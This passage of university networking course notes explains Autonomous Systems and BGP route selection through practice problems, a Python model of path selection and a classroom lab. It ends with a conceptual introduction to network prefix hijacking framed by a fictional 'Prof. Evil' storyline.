Even if we could find a routing algorithm that satisfies every organization on Earth (we can't!—but suspend disbelief for a moment), other problems would remain. Would the Pentagon want its traffic to Afghanistan routed via Iran, even if routers within Iran were along the ideal route? Even in peacetime, a country may decide that it would like traffic that begins and ends in the country to stay exclusively within the country; for instance, we might want traffic from San Diego to San Antonio to avoid Mexico, even though a straight line from San Diego to San Antonio would travel through Mexico twice. In a commercial context, an organization might not want to carry traffic that begins on a competitor's network and ends on another competitor's network, unless the competing networks are willing to pay.

In a nutshell, the problem is that the owners of individual networks each want to set their own rules for routing within their networks, without being concerned with what rules others are electing to follow. So, then, what to do? The answer (remember, this is America, and we believe in freedom!): Let entities that own portions of the Internet run their own routing algorithms, independent from what others might be doing!

II. Autonomous Systems
This problem is solved by partitioning the Internet into a number of separate networks, called Autonomous Systems (AS's).
The organization which owns the AS may independently choose the routing algorithm of its liking to be used within the AS. If Organization X runs AS X, it is free to run a routing algorithm within its network that minimizes cost. If Organization Y runs AS Y, it is free to run a routing algorithm within its network that minimizes delay. We say that each AS runs an interior routing algorithm, which is, in common parlance, referred to as an interior gateway protocol.

The Internet, thus, is actually a collection of Autonomous Systems. There are approximately 48,500 Autonomous Systems connected to the Internet today. Each AS is under the control of a single administrator. AS's range in size and scope from corporations (e.g., General Motors is an AS) to large Internet Service Providers (e.g., Comcast is an AS). Again: each AS can decide how it wants to route within its own AS.

1. The Powers that Be
Each autonomous system (whether small, medium, or large) is given an autonomous system number (ASN) by the Internet Corporation for Assigned Names and Numbers (ICANN). Assigning an ASN follows a procedure similar to the assignment of blocks of IP addresses. Referring to the picture on page 297 of the notes:
1) The Internet Assigned Numbers Authority (IANA) distributes ASNs.
2) IANA allocates blocks of ASNs to the five Regional Internet Registries.
3) Each Regional Internet Registry distributes the ASNs as autonomous systems are developed and require an ASN.
4) Each ASN is a 32-bit unique identifier which is typically represented as a decimal value (e.g., AS6059 is the University of Maryland).

Although there are different sizes of ASes, they are not categorized according to their size. Rather, they are categorized according to how they are connected to other ASes.

2. AS Categories
Stub AS
a. A stub AS has only one connection to another AS.
b. Data traffic either originates or terminates in a stub.
In other words, the stub autonomous system is either a source or a destination of data.
[Figure: Stub Autonomous System]

Multihomed AS
a. A multihomed AS may have more than one connection to other ASes, but doesn't allow data to transit through it.
b. This autonomous system is still either a source or a destination of data.
c. A customer network is a good example of a multihomed AS. In the picture to the right, the customer network will not support traffic that begins with a user in ISP 1 and is destined for a user in ISP 2.
[Figure: Multihomed Autonomous System]

Transit AS
a. A transit AS is connected to more than one AS.
b. A transit AS allows traffic to pass through.
c. Provider networks and the backbones are examples of transit AS's. In the picture to the right, the transit AS will support traffic that begins with a user in ISP 1 and is destined for a user in ISP 2.
[Figure: Transit Autonomous System]

Practice Problem 17.1
Consider the picture below, showing the interconnection of four AS's. Note that traffic can route from New York through Paris and Cannes and eventually get to Bonn, but traffic that goes from New York to Berlin to Bonn and on to Stuttgart cannot proceed onward to Cannes. What are the categories of each of the AS's?
[Figure: four interconnected AS's, AS1 through AS4]
Solution:

Practice Problem 17.2
Problems with routing protocols arise from issues of scalability or from issues of administration. Classify each of the problems below as a problem of scalability or of administration.
(a) Verizon wants Netflix to pay for routing data through its network.
(b) Routers can only hold a limited number of table entries.
(c) Extremely large routing tables cause delays in packet forwarding.
(d) Brazil and Europe decided not to route their traffic through the United States to avoid NSA spying.
Solution:
(a)
(b)
(c)
(d)

3. Routing with Autonomous Systems
We can route among multiple networks within a single AS by using the intra-domain (interior) routing protocol decided upon by the organization exercising administrative control of the AS. But since each AS might be doing something different, how do we interconnect AS's so that they can communicate with each other? This requires that each AS run, in addition to its internal protocols, a global protocol that glues all of the AS's together. This global routing protocol is variously referred to as an inter-AS routing protocol, an inter-domain routing protocol, or an exterior gateway protocol. Specifically, the inter-domain protocol the Internet utilizes is the Border Gateway Protocol (BGP). Thus, in the Internet, routing between AS's is done using BGP.
[Figure: from Tanenbaum, Computer Networks, 4th ed., Prentice Hall]

III. Overview of BGP
BGP is a complex protocol. Let's first learn to appreciate this protocol by looking at an example that abstracts away many of the complexities. Let's begin by limiting the discussion to the routers that actually run the Border Gateway Protocol—the routers that are on the boundary of one AS and have a connection to another AS. The diagram below, for example, shows two AS's interconnected. In this case, routers R1 and R2 would run the BGP protocol. These two routers—R1 and R2—we term BGP routers.

BGP routers see the graph of the Internet very differently from ordinary routers. To a BGP router, the Internet is a set of AS's and the links connecting them. As a simplified example, BGP routers might see the Internet as the picture shown below, where all nodes (A through K) are BGP routers.
[Figure: BGP graph with routers A through K, from Tanenbaum, Computer Networks, 4th ed., Prentice Hall]

Let's say that if we superimpose AS's onto this figure, we see the picture below.
[Figure: the BGP graph with AS's superimposed. Legend: AS1: Pentagon; AS2: Afghanistan; AS3: Comcast; AS4: AT&T; AS5: Sprint; AS6: Death to America; AS7: Verizon; AS8: Starbucks.]

Note that we see our three flavors of AS in the picture above:
- Stub AS's have a single connection to the BGP graph. Thus, stub AS's cannot route traffic that begins and ends at other AS's. In the picture above, AS8 is a stub.
- Multi-homed AS's connect to two different AS's but refuse to carry transit traffic. For example, in the figure above, suppose AS2 is willing to send traffic originating within AS2 to either one of its neighbors (AS5 or AS6) and is willing to accept traffic from either one of its neighbors, provided the traffic terminates at a user in AS2. But suppose that AS2 is not willing to route traffic from AS5 to AS6. If these conditions hold, AS2 is a multi-homed AS.
- Transit AS's are willing to carry transit traffic originating and ending in other AS's. For example, in the figure above, if AS4 is willing to carry traffic from AS3 to AS5 (and vice versa), then AS4 is a transit AS.

Let's return to our picture of the Internet, focusing on Router F in AS1 and Router D in AS2:
[Figure: Router F in AS1 (Pentagon) and Router D in AS2 (Afghanistan), with AS6 (Death to America) between them]

Each BGP router maintains a routing table to other destinations. However, BGP keeps the full path in use for each destination. BGP routers exchange tables with neighbors, telling neighbors the exact path in use. Let's focus on AS1, the Pentagon, which wants to send data to AS2, a US command center in Afghanistan. In terms of the BGP graph, Router F wants to send traffic to Router D. With BGP, each of Router F's neighbors—Router B, Router E, Router I and Router G—will tell Router F the full path they use to reach Router D. Let's look at each in turn:

Router B: "Hi Router F. When I want to reach Router D I take the path B – C – D (which is AS3 – AS6 – AS2)."
Router I: "Hi Router F. When I want to reach Router D I take the path I – J – H – D (which is AS4 – AS5 – AS2)."
Router G: "Hi Router F. When I want to reach Router D I take the path G – C – D (which is AS7 – AS6 – AS2)."

Note that an interesting thing happens when Router E starts to talk to Router F:
Router E: "Hi Router F. When I want to reach Router D I take the path E – F – …"
Router F: "STOP RIGHT THERE! I'm not interested in your route since it goes through me."

The point illustrated above bears repeating: An AS will not accept a route containing its own AS number, because this would cause a routing loop.

So, now Router F looks at the information it has received:
To get to Router D in AS2:
- Go via Router B: The path will be B – C – D (which is AS3 – AS6 – AS2).
- Go via Router I: The path will be I – J – H – D (which is AS4 – AS5 – AS2).
- Go via Router G: The path will be G – C – D (which is AS7 – AS6 – AS2).

Here is where the beauty (and the complexity) of BGP enters the picture: BGP allows the AS network administrator to impose policies on how traffic is routed. These policies are manually entered into the BGP router. So, for instance, if the network administrator of AS1 sets the policy rule

    No traffic originating in AS1 will transit through Router C: AS6

then BGP Router F can immediately decide on the route from Router F to Router D by striking the offending entries from the table above:
To get to Router D in AS2:
- Go via Router B: B – C – D (AS3 – AS6 – AS2). Ruled out: the path transits Router C in AS6.
- Go via Router I: I – J – H – D (AS4 – AS5 – AS2). The only path that satisfies the policy.
- Go via Router G: G – C – D (AS7 – AS6 – AS2). Ruled out: the path transits Router C in AS6.

Let's conclude our Big Picture overview of BGP by summarizing what BGP does (and doesn't do).
A router running BGP:
first attempts to find all paths from the router to a given destination,
then judges these paths against the policies of the AS administrator,
and then selects a "good-enough" path to the destination that satisfies the policy constraints.

In the third step above, why did we say that BGP "selects a 'good-enough' path to the destination"? Why didn't we say that BGP "selects an optimal path to the destination"? The reason: BGP selects routes across multiple AS's, each having its own (potentially conflicting) definition of optimality. Whereas intra-domain routing algorithms (confined to operate within a single AS) can attempt to find a least-cost path, BGP can only find a "good-enough" path that will work while satisfying policy constraints. Thus BGP really only provides an indication of reachability, that is, the availability of routes from source to destination. BGP makes no attempt to advertise routing optimality.

Unfortunately, BGP makes no attempt to provide security either, a topic we will explore.

Practice Problem 17.3
Consider the network shown below.
[Figure: network for Practice Problem 17.3]
(a) What type of Autonomous System is AS3?
(b) What would happen if AS1 declared itself to be a multi-homed AS?
Solution:
(a)
(b)

Effect of BGP on Routing Tables

In Chapters 15 and 16 we showed how routing algorithms such as link-state routing and distance vector routing can be used to build up routing tables within an isolated AS. In this chapter we showed how BGP routers determine the routing decisions for traffic that has to traverse multiple AS's. This may leave you wondering: do routers have two routing tables, one for routing within the AS and another for routing to a different AS? The answer is no: routers have a single routing table. Once the BGP routers have decided the correct paths to other autonomous systems, that information is injected into the existing routing tables of the other routers within the AS.
Put another way: the information gathered by BGP is incorporated into the intra-domain routing tables.

IV. BGP Route Selection

So, how are BGP routes selected? Let's return to the notation where, from the viewpoint of a BGP router, the Internet is a collection of interconnected AS's. Let's suppose, for example, that you are the BGP router for AS1 in the network shown below. Let's say that your goal is to send data to your friend in AS3. Note that your data can travel over three potential routes.

[Figure: AS1's three candidate routes to AS3]

We will develop the BGP path selection algorithm incrementally. For starters, we will say that the BGP path selection algorithm is shown in the flow chart below.

[Flow chart: first version of the BGP path selection algorithm. Step 1: apply the AS policies. Step 2: among the remaining routes, select the one that traverses the fewest AS's.]

So, first and foremost, the AS policies are considered. After weighing the AS policies, the route that traverses the fewest number of AS's is selected.

Practice Problem 17.4
You are the BGP router for AS1 in the network shown below, and you would like to send data to AS3.
[Figure: network for Practice Problem 17.4]
(a) What path is used if the administrator for AS1 has set a policy that no data from AS1 may go to AS2?
(b) What path is used if the administrator for AS1 has set no specific local preferences?
Solution:
(a)
(b)

Note that the local preference does not need to be a binary go/no-go decision (such as "Do not route through AS2"). The local preference can also be specified as an integer, where a higher integer indicates a more preferred path.[33] Local preferences can also be applied to specific network prefixes rather than an entire AS. As indicated earlier, how local preferences are structured is completely at the discretion of the network administrator. Part of BGP's strength is the high degree to which it can be customized.

Footnote 33: Note that in BGP local preferences, higher values indicate a stronger preference. This differs from the intra-domain routing protocols we have examined, for which lower weights were preferred (i.e., we chose paths with the lowest weight).
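The selection steps just described (reject a route that already contains your own ASN, strike routes forbidden by policy, prefer the highest local preference, then the fewest AS's) can be modelled in a few dozen lines. The Python below is an added example written for these notes, not code from the course or from any BGP implementation. The Router F advertisements are the ones from the chapter's example; the neighbour names, the continuation of Router E's path, and the local-preference values in local_pref_example are constructed for illustration. Real BGP has further tie-breakers beyond the two covered here.

```python
"""
Added example (not from the EC310 notes): a minimal model of the BGP path
selection steps covered in this chapter, applied at one BGP router.

Order of decisions, as the chapter presents them:
  1. reject any advertised path that already contains our own ASN (loop check),
  2. reject any path that violates an administrator policy (a forbidden AS),
  3. prefer the highest LOCAL_PREF set by the administrator (higher wins),
  4. among the survivors, prefer the path that traverses the fewest AS's.

Requires Python 3.9+ (built-in generic type hints).
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Advertisement:
    """One neighbour's announcement: 'to reach the destination, I use as_path'."""
    next_hop: str          # the neighbouring BGP router that told us
    as_path: list[int]     # AS numbers traversed, nearest first


@dataclass
class BgpRouter:
    my_asn: int
    forbidden_asns: set[int] = field(default_factory=set)          # "never transit AS X"
    local_pref: dict[tuple[int, ...], int] = field(default_factory=dict)  # per-path LOCAL_PREF
    default_pref: int = 100                                         # used when no value is set

    def accepts(self, adv: Advertisement) -> tuple[bool, str]:
        """Loop check and policy filter. Returns (accepted?, reason)."""
        if self.my_asn in adv.as_path:
            return False, f"loop: AS{self.my_asn} already in path"
        bad = self.forbidden_asns.intersection(adv.as_path)
        if bad:
            return False, f"policy: path transits forbidden AS{min(bad)}"
        return True, "ok"

    def select(self, advs: list[Advertisement]) -> Optional[Advertisement]:
        """Return the chosen advertisement, or None if nothing survives policy."""
        survivors = [a for a in advs if self.accepts(a)[0]]
        if not survivors:
            return None
        # Higher LOCAL_PREF wins; ties broken by fewest AS's in the path.
        # Remaining ties keep the first advertisement seen (min() is stable).
        return min(
            survivors,
            key=lambda a: (-self.local_pref.get(tuple(a.as_path), self.default_pref),
                           len(a.as_path)),
        )


# Router F in AS1 (Pentagon) wants to reach Router D in AS2 (chapter example).
F_ADVERTISEMENTS = [
    Advertisement("B", [3, 6, 2]),   # B - C - D
    Advertisement("I", [4, 5, 2]),   # I - J - H - D
    Advertisement("G", [7, 6, 2]),   # G - C - D
    Advertisement("E", [1, 2]),      # E - F - ...: F sits in AS1, so AS1 is in the path
                                     # (the rest of E's path is constructed)
]


def router_f_choice(forbid_as6: bool) -> Optional[str]:
    """Next hop Router F picks, with or without the 'never transit AS6' policy."""
    f = BgpRouter(my_asn=1, forbidden_asns={6} if forbid_as6 else set())
    best = f.select(F_ADVERTISEMENTS)
    return best.next_hop if best else None


def local_pref_example() -> list[int]:
    """Constructed case: a longer path with a higher LOCAL_PREF beats a shorter one."""
    r = BgpRouter(my_asn=1, local_pref={(4, 5, 3): 500, (6, 3): 100})
    best = r.select([Advertisement("X", [4, 5, 3]), Advertisement("Y", [6, 3])])
    return best.as_path


if __name__ == "__main__":
    print("no policy      ->", router_f_choice(False))   # all three surviving paths tie at 3 AS's
    print("AS6 forbidden  ->", router_f_choice(True))    # only the path via I survives
    print("local pref 500 ->", local_pref_example())
```

Note that the loop check is applied before anything else: Router E's announcement never reaches the policy or preference stages, exactly as in the "STOP RIGHT THERE!" exchange above.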
Practice Problem 17.5
Suppose that in the network below, the administrator for AS1 has set a policy that no data from AS1 may go to AS2. Additionally, AS1 has set a local preference value of 500 on the AS4-AS5-AS3 path and a value of 100 on the AS6-AS7-AS3 path. Which path does data traverse from AS1 to AS3?
[Figure: network for Practice Problem 17.5]
Solution:

It should be noted that we have only skimmed the surface of the BGP protocol. There are other attributes that can enter into the path selection algorithm beyond those mentioned above (local preferences and fewest AS's in the path).

How do ASs relate to me?

In an article first reported on the website Ars Technica in February 2014,[34] telecommunication companies Verizon and Cogent Communications had a disagreement over peering. Cogent is a large backbone provider and also provides Internet connectivity for a "small company" called Netflix, which by some estimates accounts for over 30 percent of current Internet traffic. Apparently, Netflix traffic was overwhelming the links to the Verizon network, causing many packets to be dropped. However, Verizon refused to upgrade its infrastructure. Note that Verizon and Cogent have multiple peering points throughout the US. From Verizon's viewpoint, Cogent was sending it far more traffic than Verizon sent to Cogent, so Cogent should pay for any upgrades. The result was that Verizon customers perceived Netflix, and anything else traversing those links, as slow or unresponsive. To alleviate problems such as this, Netflix has resorted to making deals with Internet Service Providers such as Comcast, Verizon, and AT&T to connect directly to their networks and deliver traffic. Each company in this situation has a network large enough to be an AS. BGP is the mechanism by which these ASes advertise routing information to each other. When two ASes feud as above, it can have a noticeable effect on their customers' Internet experience.
Footnote 34: See http://arstechnica.com/information-technology/2014/02/netflix-packets-being-dropped-every-day-because-verizonwants-more-money/ for more details.

Problems

1. Which of the following are examples of why a single-protocol internet would be a concern? (Choose all that apply)
a. Across the globe, individual network administrators each want to set their own rules for routing within their networks without being concerned with what rules others are electing to follow.
b. The world's network administrators unanimously agree on the best single routing algorithm that satisfies all of their respective networking and routing needs.
c. Under a single-protocol internet structure, searching for a destination would be extremely time-consuming.
d. Under a single-protocol internet structure, updating the routing tables would create excessive amounts of needless traffic.

2. Fill in the appropriate Autonomous System (AS) category or categories under each of the descriptions below (choose from: Stub, Multihomed, and Transit).
a. An AS is connected to more than one other AS and it allows traffic to pass through it.
b. An AS has only one connection to another AS, and it can act as a source or destination of data.
c. An AS may be connected to one or more ASs, and it does not allow data to pass through it, but it can still act as a source or destination of data.
d. A 'Provider Network' is a good example of this type of AS.
e. A 'Customer Network' is a good example of this type of AS.

3. True or False. BGP provides an indication of reachability which ensures that the optimal route is advertised. Explain your answer.

4. Refer to Figure 1 below and label each AS with its correct category: Stub, Multihomed, or Transit. (Assume AS4 is set up to pass along traffic originating from and ending in other AS's, but AS2 will not do this.)
[Figure 1: Four Autonomous Systems]

5.
State and briefly describe the two problems solved by partitioning the Internet into a number of separate Autonomous Systems instead of using a single routing protocol.

6. If I want to use a method besides local preferences to ensure that our traffic does not go through ASs that are not trusted or that are unfriendly, I would
a. secure my BGP routers to ensure no traffic is transmitted.
b. buy all the ASs between the source and destination so I know I could trust them.
c. ignore any advertised routes that contain those dangerous ASs.
d. use an MD5 hash on the link state packets I transmit.

Security Exercise 17

Part 1: Initial Setup

Let's put to use the networking skills we have learned to date to better understand how the Internet works and where our traffic is supposed to go.

1. Set-Up

[Sidebar: Man, I love cyber! I also love basketball. Who am I and how many inches did I grow as a mid?]

Equipment needed:
A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet at the back of this exercise and have them ready to fill in.
Your issued laptop.
o Ensure Chrome or Firefox is installed on your Windows computer.
o Turn up the volume on your computer.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
o Wait for an IP address to be assigned to your LAN interface.
o Verify by pressing the Windows Orb key and, in the program search bar, typing cmd. Hit Enter to launch the Windows terminal and then, at the command prompt, execute ipconfig.

Now your screen should look similar to the figure below.
[Figure: ipconfig output showing the Ethernet adapter's IP address]
Your Ethernet adapter should be assigned an IP address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 101 and 254. If not, notify your instructor or lab technician.

Part 2: Welcome to the EC310 Internet!

1. A Quick Review

Once again, locate EC310 MID on your network diagram.
Your Windows laptop has just joined the virtual network you connected to previously in SX#15 and SX#16. Specifically, your Ethernet card has been assigned an IP address on this virtual network. As before, in order for your packets to leave this virtual network and venture out into the virtual world, your laptop must send them to a gateway router. Router A serves this purpose again for the network you are connected to. However, in order to send your packets to Router A, your computer must know several things first. Answer the following questions using the information from ipconfig.

Question 1: What is your network address and network mask in CIDR notation?

Question 2: What is the default gateway's IP address?

Question 3: What protocol would your computer use to identify the MAC address of the default gateway?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol

Question 4: Why would your computer need to know the MAC address of the default gateway to reach the Internet?

New to this virtual world are a number of Autonomous Systems (ASes) which comprise the EC310 Internet. You are located in AS2016, the virtual US Naval Academy. Two Internet Service Providers (ISPs) connect AS2016 to the remainder of the Internet: (1) AS20, Bay Area Broadband, and (2) AS30, Chesapeake Cable. The Naval Academy connects to two ISPs to provide redundancy in its communication infrastructure and to balance network traffic during peak demand. However, it does not wish to carry traffic from Bay Area Broadband to Chesapeake Cable or vice versa.

Question 5: What category of Autonomous System is AS2016?

Question 6: What category of Autonomous System are AS20 and AS30?

For your Internet traffic to leave AS2016 it must reach Router 16. Router A does not have a direct connection to Router 16 and therefore must learn how to reach it.

Question 7: What protocol will Router A use to discover the optimal path to Router 16?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol

Question 8: This is an example of what type of routing protocol?
Intra-domain Routing Protocol
Inter-domain Routing Protocol

Router A discovers that the optimal path to Router 16 is through a direct connection to Router C via the 2.2.2.0/29 network. Router C will forward all traffic destined for addresses external to AS2016 to Router 16. Router 16 will decide where to forward these packets using information it has gained about the Internet from Router 20 in AS20 and Router 30 in AS30.

Question 9: What protocol will Router 16 use with Router 20 and Router 30 to learn where to reach a destination on the Internet?
Address Resolution Protocol
Open Shortest Path First Protocol
Border Gateway Protocol

Question 10: This is an example of what type of routing protocol?
Intra-domain Routing Protocol
Inter-domain Routing Protocol

2. A Brief Respite

Let's be honest. It's been a little rough these past ten weeks learning about the stack-based buffer overflow and how computer networks interconnect. Wouldn't it be nice to have a break for a change? Have no fear. The ECE Department, universally known as The Caring Department, has come to your aid once again. For your viewing pleasure, in this virtual world there is a new website located at http://www.midtube.com. Verify the website www.midtube.com exists by opening Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) and navigating to the website address. Log in by creating a username and password of your choice (do not use a username or password you would not like exposed). Browse the website to see what information is available.

Question 11: What does the Zoomie say?

3. How Do I Get There Again?

Of course nothing is ever easy in EC310, and neither is the process to reach the MidTube webserver across the EC310 Internet.
Router 16 is responsible for directing your Internet traffic to this website and, as you just learned in Chapter 17, it goes through a path selection algorithm to determine where to send your web requests. To better understand how this path selection algorithm works, it is important to know what information Router 16 will receive about the Internet from its neighboring ASes. Let's work backwards from the target destination, MidTube's webserver, to construct this information.

First, the MidTube webserver is located on the network 17.17.200.0/24, which is originally advertised by Router 5 to Router 50 in AS50 and Router 60 in AS60. Once Router 50 hears about this network, it will apply its own BGP path selection algorithm to determine whether any local preferences reject or select the path suggested by Router 5 to reach network 17.17.200.0/24. If there are no local preferences, it will compare the path received from Router 5 with all other paths that Router 50 has learned to reach 17.17.200.0/24, to determine whether the path through R5 has the shortest AS-path length. If it does, Router 50 will prepend (i.e., put in front) its own AS number to the AS-path list to indicate that 17.17.200.0/24 can be reached through AS50. Router 50 will then forward this new announcement to all of its other peers via a BGP update message.

Question 12: Assuming no local preferences are set, what path will Router 50 advertise to all other peers to reach network 17.17.200.0/24? Label part a) on your network diagram with the network address and the AS-Path that Router 50 will announce to all other peers.

Once Router 30 learns about network 17.17.200.0/24 from Router 50, it will also apply its own BGP path selection algorithm, prepend its AS number to the selected path, and announce this network and path to its BGP peers.

Question 13: Assuming no local preferences are set, what path will Router 30 advertise to all other peers to reach 17.17.200.0/24? Label part b) on your network diagram with the network address and the AS-Path that Router 30 will announce to all other peers.

Router 20 will also learn about possible paths to network 17.17.200.0/24 from its peers in a similar fashion. It connects with another ISP, AS40, Monsoon Megabyte, and a startup web hosting company, AS2003, based in Eastern Europe. The web hosting company welcomes all traffic to it, but it does not provide transit between autonomous systems.

Question 14: Assuming no local preferences are set, what path will Router 20 advertise to its peers to reach 17.17.200.0/24? Label part c) on your network diagram with the network address and the AS-Path that Router 20 will announce to all other peers.

Finally, Router 16 will learn about the network 17.17.200.0/24 from both Router 20 and Router 30. It will also apply its own BGP path selection algorithm to decide which path it should use in order to reach the network 17.17.200.0/24 which contains the MidTube webserver.

Question 15: Assuming no local preferences are set, and comparing your answers to parts b) and c) on your network diagram, what path will Router 16 select to get to the MidTube webserver on network 17.17.200.0/24? Draw a line on your network diagram of the selected path starting from EC310 MID going all the way to the MidTube webserver.

Recall from SX#15 and SX#16 that there are two methods to discover information about the actual route traversed between you and a destination IP address. The first method is the utility ping with record route, which tells you the IP addresses of the OUTGOING interfaces along the way to and from the final destination. The second method is the utility traceroute, which works similarly to ping except that it tells you the address of the INCOMING interface at each hop along the path between you and your destination. Windows has both utilities available, but we will only use the utility traceroute for this security exercise.
Additionally, it is important to know that this utility has a slightly different name in Windows, tracert, as shown in the example in Figure 1 on page 4.

Question 16: Confirm your answer to Question 15 by performing a tracert (do not forget the –d option) to the MidTube webserver. List the IP addresses in the order they appear on your answer sheet.

[Figure 1: Example of the tracert command]

Part 3: The Return of Prof. Evil

ITSD, after discovering the malicious behavior of Prof. Evil in SX#16, conducted a thorough security review of all routers within the USNA network. They implemented several technical solutions to prevent a malicious actor within AS2016 from injecting false routing information into the USNA network.

Question 17: What are two technical solutions ITSD may have implemented to protect against false route injection within the USNA network?

With his evil plans thwarted, Prof. Evil must now look for new ways to prevent midshipmen from reaching websites of interest. Ever since the new security policies took effect, he has become increasingly abrasive in class. In fact, he completely skipped entire sections of the last lecture and refused to complete practice problems in class. He even asked you to read the chapter notes on your own (the audacity!). Reluctantly, you arrange for an EI session with Prof. Evil to help prepare for the next exam, but upon arrival at his office he shouts at you to leave immediately. Embittered, you turn to leave but notice out of the corner of your eye a web page on his computer, www.pta.net. Verify the website www.pta.net exists by opening Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) and navigating to the website address. Browse the website to see what information is available.

Question 18: What does the PTA believe concerning students' time?

Question 19: What device was used as part of a novel in-class exercise to enhance STEM-based learning?
It seems MIDN Roy may not be the only member of the Naval Academy with an extreme ideology. Concerned, you decide to investigate things further by identifying the source of this propaganda. Specifically, you want to know who is responsible for publishing this content and how it can be reached across the Internet. You speak with ITSD about this matter and discover that AS2003 hosts network 21.200.3.0/24, where the PTA webserver is located. ITSD also informs you that they have implemented several local preferences in BGP to limit Prof. Evil's impact on the other Internet users. Specifically, AS30, Chesapeake Cable, is weighted over AS20, Bay Area Broadband, for all traffic destined for network 21.200.3.0/24.

Question 20: Given your discoveries, what path will Router 16 select to reach the PTA webserver on network 21.200.3.0/24?

Question 21: Confirm your answer to Question 20 using tracert (do not forget the –d option) to identify the actual path to the PTA webserver. Did it match your expected results?

Your friend is confused. He looks at his network diagram and realizes the shortest AS path to network 21.200.3.0/24 is directly through AS20. Why would traffic destined for this network travel through another route?

Question 22: What is the answer to your friend's question? Explain.

Part 4: MidTube?

Exhausted from your detailed investigation, you decide to check if there are any new videos on MidTube, because sometimes you just don't want to pay attention in class. To increase speed and performance, your web browser stores a local copy of the webpage so it does not have to access the MidTube webserver as often. Unfortunately, this also means that new content might be missed unless you force your web browser to refresh. Navigate to the website www.midtube.com. When directed, force your web browser to refresh www.midtube.com using either method below.
Ctrl + Shift + R
or Shift + (click the browser's Reload button)

Question 23: Gasp... What shocking event just happened!?
Frustrated by EC310 yet again, you turn to your email and see the following note:

Dear EC310 Midshipmen,
I have reported you and your precious MidTube to the PTA! Your singing, dancing, and general happiness are NOT furthering your education in my classes! Although ITSD has restricted my ability to influence the USNA network, their authority ends at its border. Therefore, you will suffer under my limited purview until you complete the attached assignment. Only then will I ask the PTA to restore MidTube.
Never respectfully,
Prof. Evil
<SX19_An_Analysis_of_The_Rectabular_Excrusion_Bracket.docx>

To Be Continued... (in SX 18!)

Question 24 (Extra Credit): How was the PTA able to take down MidTube? (Hint: Think back to SX#16)

Part 5: Clean Up
Close all tabs in Chrome or Firefox.
Disconnect the blue Ethernet cable.
Turn on your wireless adapter.

Security Exercise 17 Answer Sheet

Name:
Question 1:
Question 2:
Question 3 (circle one): Address Resolution Protocol / Open Shortest Path First Protocol / Border Gateway Protocol
Question 4:
Question 5:
Question 6:
Question 7 (circle one): Address Resolution Protocol / Open Shortest Path First Protocol / Border Gateway Protocol
Question 8 (circle one): Intra-domain Routing Protocol / Inter-domain Routing Protocol
Question 9 (circle one): Address Resolution Protocol / Open Shortest Path First Protocol / Border Gateway Protocol
Question 10 (circle one): Intra-domain Routing Protocol / Inter-domain Routing Protocol
Question 11:
Question 12: See part a) of your network diagram.
Question 13: See part b) of your network diagram.
Question 14: See part c) of your network diagram.
Question 15: Draw the selected path on your network diagram.
Question 16:
Question 17:
Question 18:
Question 19:
Question 20:
Question 21:
Question 22:
Question 23:
Question 24 (Extra Credit):

[Network diagram: EC310 Security Exercise 17 & 18. Recoverable labels: AS 2016 (EC310 MID on network ?.?.?.?/??, RA, RC, R16, links 2.2.2.0/29 and 3.3.3.0/30, Other USNA Networks); AS 20 (R20); AS 30 (R30); AS 40 (R40); AS 50 (R50); AS 60 (R60); AS 2003 (R3, www.pta.net at 21.200.3.2 on 21.200.3.0/24; announcement "Network: 21.200.3.0/24, AS-Path: 2003", marked SX18 ONLY); AS 2005 (R5, www.midtube.com at 17.17.200.2 on 17.17.200.0/24; announcement "Network: 17.17.200.0/24, AS-Path: 2005"). Inter-router links: 4.4.4.0/24, 7.7.7.0/30, 8.8.8.0/30, 9.9.9.0/30, 12.12.12.0/30, 13.13.13.0/30, 14.14.14.0/30, 15.15.15.0/30, 16.16.16.0/30, 18.18.18.0/30, 19.19.19.0/30, 20.20.20.0/30, with .1/.2 (and .10) interface addresses. Boxes a), b), c) and one further box to be filled in, each reading "Network: ___.___.___.___/__  AS-Path: ________".]

Chapter 18: Border Gateway Protocol Routing

Objectives:
(a) Given a network diagram consisting of a limited number of connected Autonomous Systems (AS) and various BGP path announcements, determine the direction of traffic across all ASes in accordance with the BGP path selection algorithm.
(b) Identify what is required to secure Internet routing, distinguish the negative and positive consequences of various proposed solutions, and recognize the state of security in Internet routing today.
(c) Describe the steps that should be taken to prevent false route injection in or manipulation of the Internet routing system, and identify who is responsible for performing these preventative actions and how they can be applied.
(d) State the fundamental principle of communication as it relates to security.

When we last left off in Security Exercise 17, your viewing pleasure was rudely interrupted by Prof. Evil. Specifically, Prof.
Evil contacted the Professional Teaching Association (PTA), who took it upon themselves to disrupt access to MidTube for all Internet users. But how did the PTA pull off such a feat? More importantly, why were they able to do this, and how can they be stopped?

I. Stealing the Internet: Network Prefix Hijacking

1. MidTube?

The essence of the PTA's attack rests on the same principles we saw at work in Chapter 16. That is, the PTA had to take four distinct actions in order to deny you access to the MidTube webserver:
1. Take control of a machine on the network and manipulate its operation.
2. Force the machine to tell the "right" kind of lie.
3. Force the machine to spread the lie around.
4. Force other machines to believe the lie.

The only change from Chapter 16 was the introduction of BGP and its subsequent manipulation to facilitate the PTA's objectives. By generating the appropriate BGP route announcement, the PTA forced their router to hijack the network prefix belonging to the MidTube webserver, making it look as if this prefix originated within their own Autonomous System (AS). However, before we dive into the details of their attack, let's make sure we have the correct understanding of where your traffic should go under normal circumstances.

[Cartoon caption: "Stick 'em up, partner! The Internet is like the Wild West in many ways and I am hijacking your network prefix!"]

Practice Problem 18.1
Consider the network diagram and BGP route announcement from Router 5 of AS2005 below. Assuming no local preferences are set, what path will all packets leaving AS2016 take in order to reach the MidTube webserver at 17.17.200.2?
[Network diagram for Practice Problem 18.1: the Security Exercise 17 & 18 topology (AS 2016 with RA, RC, R16; AS 20, AS 30, AS 40, AS 50, AS 60; AS 2003 with R3 and www.pta.net at 21.200.3.2 on 21.200.3.0/24; AS 2005 with R5 and www.midtube.com at 17.17.200.2 on 17.17.200.0/24). Router 5 of AS2005 announces: Network: 17.17.200.0/24, AS-Path: 2005.]

